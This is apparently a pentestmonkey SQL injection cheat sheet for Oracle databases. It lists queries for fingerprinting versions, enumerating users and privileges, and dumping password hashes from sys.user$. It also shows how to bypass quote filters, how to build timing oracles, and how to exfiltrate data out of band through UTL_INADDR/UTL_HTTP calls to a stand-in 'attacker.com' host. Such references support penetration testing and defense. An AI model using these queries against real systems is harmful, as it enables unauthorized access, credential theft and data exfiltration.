Source: pentestmonkey.net
Version: SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'; | SELECT banner FROM v$version WHERE banner LIKE 'TNS%'; | SELECT version FROM v$instance; |
Comments: SELECT 1 FROM dual -- comment | -- NB: SELECT statements must have a FROM clause in Oracle, so the dummy table 'dual' is used when not actually selecting from a table. '--' comments out the rest of the line; Oracle also accepts /* ... */ block comments. |
List Users: SELECT username FROM all_users ORDER BY username; | SELECT name FROM sys.user$; -- priv (requires elevated privileges, e.g. DBA or SELECT ANY DICTIONARY) |
List Password Hashes: SELECT name, password, astatus FROM sys.user$; -- priv, <= 10g (legacy hash format in PASSWORD) | SELECT name, spare4 FROM sys.user$; -- priv, 11g and later (newer SHA-based hash formats are stored in SPARE4; PASSWORD may be empty) |
List Privileges: SELECT * FROM session_privs; -- current user's privs | SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'; -- priv, list a given user's privs | SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'; -- priv, find users holding a particular priv | SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS; -- priv, role assignments |
Location of DB files: SELECT name FROM V$DATAFILE; |
Avoiding Quotes: SELECT chr(65) || chr(66) FROM dual; -- returns AB (build string literals from chr() when the single quote is filtered) |
Hostname, IP Address: SELECT UTL_INADDR.get_host_name FROM dual; | SELECT host_name FROM v$instance; | SELECT UTL_INADDR.get_host_address FROM dual; -- gets IP address | SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- resolves an IP to a hostname. NOTE: on 11g and later, UTL_INADDR/UTL_HTTP calls are subject to network ACLs and may be denied unless the current user has been granted access. |
Time Delay: BEGIN DBMS_LOCK.SLEEP(5); END; -- priv (needs EXECUTE on DBMS_LOCK); this is a PL/SQL block and cannot be embedded in a SELECT | SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- if reverse lookups are slow | SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; -- if forward lookups are slow | SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; -- if outbound TCP is filtered / slow. NB: the network-based delays depend on the target's resolver and egress path, so they are far less reliable than DBMS_LOCK.SLEEP as a timing oracle. |
Case Statement: SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- returns 1 | SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2 |
Make DNS Requests: SELECT UTL_INADDR.get_host_address('google.com') FROM dual; | SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; -- for out-of-band confirmation or data exfiltration, use a hostname under a domain whose authoritative name server you control (as with 'blah.attacker.com' above); a lookup of google.com only proves that resolution works. |
String Concatenation: SELECT 'A' || 'B' FROM dual; -- returns AB |
Current Database: SELECT global_name FROM global_name; | SELECT name FROM v$database; | SELECT instance_name FROM v$instance; | SELECT SYS.DATABASE_NAME FROM DUAL; |
List Databases: SELECT DISTINCT owner FROM all_tables; -- lists schemas (one per user); Oracle uses schemas where other DBMSs use separate databases. Also query the TNS listener for other database instances, e.g. with tnscmd (services | status). |
List Columns: SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'; | SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' AND owner = 'foo'; -- NB: unquoted identifiers are stored in upper case, so match table_name/owner in upper case |
Bitwise AND: SELECT bitand(6,2) FROM dual; -- returns 2 | SELECT bitand(6,1) FROM dual; -- returns 0 |
If Statement: BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; -- PL/SQL only; does not work inside a SELECT statement (and needs EXECUTE on DBMS_LOCK) |
List DBA Accounts: SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; -- priv, lists users and roles holding system privileges WITH ADMIN OPTION, which approximates the DBA set; cross-check with SELECT GRANTEE FROM DBA_ROLE_PRIVS WHERE GRANTED_ROLE = 'DBA'; |
Select Nth Row: SELECT username FROM (SELECT ROWNUM r, username FROM (SELECT username FROM all_users ORDER BY username)) WHERE r=9; -- gets 9th row (rows numbered from 1). NB: ROWNUM is assigned before ORDER BY is applied within the same query block, so the ORDER BY must sit in its own inner subquery as shown; otherwise the numbering does not follow the sorted order. |
List Tables: SELECT table_name FROM all_tables; | SELECT owner, table_name FROM all_tables; |
Find Tables From Column Name: SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; -- NB: table and column names are stored in upper case |
Select Nth Char: SELECT substr('abcd', 3, 1) FROM dual; -- gets 3rd character, 'c' (positions numbered from 1) |
ASCII Value -> Char: SELECT chr(65) FROM dual; -- returns A |
Casting: SELECT CAST(1 AS char) FROM dual; | SELECT CAST('1' AS int) FROM dual; |
Char -> ASCII Value: SELECT ascii('A') FROM dual; -- returns 65 |